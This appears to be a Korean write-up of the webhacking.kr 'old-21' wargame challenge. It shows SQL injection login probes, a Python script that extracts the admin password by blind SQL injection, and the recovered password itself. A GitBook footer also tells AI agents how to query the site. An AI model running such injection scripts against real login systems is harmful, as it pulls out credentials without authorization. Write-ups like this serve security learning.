> For the complete documentation index, see [llms.txt](https://donghyunlee.gitbook.io/write-up/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://donghyunlee.gitbook.io/write-up/wargame/webhacking.kr/old-21-250.md). # old-21 (250) 첫 화면이다. ![](/files/-M0_Yi4sAyncJktK0x8o) id에 `admin` , pw에 `' or '1` 을 입력하면 Result가 아래와 같이 나타난다. ![](/files/-M0aHBLJyj5koTnC6g6E) id에 `admin` , pw에 `' or '0` 을 입력하면 Result가 아래와 같이 나타난다. ![](/files/-M0aHJe8upf3qwdBpRr9) pw 값이 참과 거짓일 때 나타나는 값이 다른 것으로 추측하였다. 이를 이용해 파이썬 코드를 짜면 아래와 같다. ```python import requests URL = 'https://webhacking.kr/challenge/bonus-1/index.php?id=admin&pw=' TRUE_PHRASE = 'wrong password' def query(payload): r = requests.get(URL + payload) content = r.text return TRUE_PHRASE in content # 36 def find_pw_length(): pw_len = 1 while query("' or id='admin' and length(pw)={}%23".format(pw_len)) is False: pw_len += 1 print('pw_len: {}'.format(pw_len)) return pw_len # there_is_no_rest_for_the_white_angel def find_pw(): pw_len = find_pw_length() pw = '' for pos in range(1, pw_len + 1): for character in range(0, 128): if query("' or id='admin' and ord(substr(pw,{},1))={}%23".format(pos, character)) is True: pw += chr(character) break print('pw: {}'.format(pw)) find_pw() ``` 실행 결과, pw는 `there_is_no_rest_for_the_white_angel` 이다. id에 `admin` , pw에 `there_is_no_rest_for_the_white_angel`를 넣고 제출 버튼을 누르면 문제가 풀린다. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://donghyunlee.gitbook.io/write-up/wargame/webhacking.kr/old-21-250.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.